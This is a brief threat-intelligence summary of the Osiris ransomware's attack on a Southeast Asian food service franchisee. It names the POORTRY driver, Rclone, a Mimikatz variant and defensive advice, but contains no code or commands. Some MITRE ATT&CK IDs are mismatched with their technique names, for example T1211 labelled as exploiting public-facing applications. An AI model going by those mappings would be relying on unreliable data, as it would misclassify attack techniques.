Summary
Key Points:
- A new ransomware strain named Osiris has emerged, targeting a major food service franchisee in Southeast Asia using a malicious driver called POORTRY in a BYOVD attack.
- The attack resulted in data exfiltration and the deployment of ransomware, which employs a hybrid encryption scheme and is capable of terminating critical processes to facilitate encryption.
- Organizations are advised to monitor dual-use tools, restrict RDP access, enforce multi-factor authentication (2FA), implement application allowlisting, and ensure off-site backup storage.
Technical Details: The Osiris ransomware utilizes a custom driver (POORTRY) to disable security software and employs tools like Rclone for data exfiltration. It has been linked to previous attacks associated with the INC ransomware group.
MITRE ATT&CK Techniques:
- T1211 - Exploit Public-Facing Application (Initial Access)
- T1075 - Pass the Hash (Credential Access)
- T1562.001 - Impair Defenses: Disable or Modify Tools (Defense Evasion)
- T1486 - Data Encrypted for Impact (Impact)
IOCs Mentioned:
- POORTRY (malicious driver)
- kaz.exe (Mimikatz variant)
- Rclone (data exfiltration tool)
Join the discussion — sign up to comment, upvote, and save articles.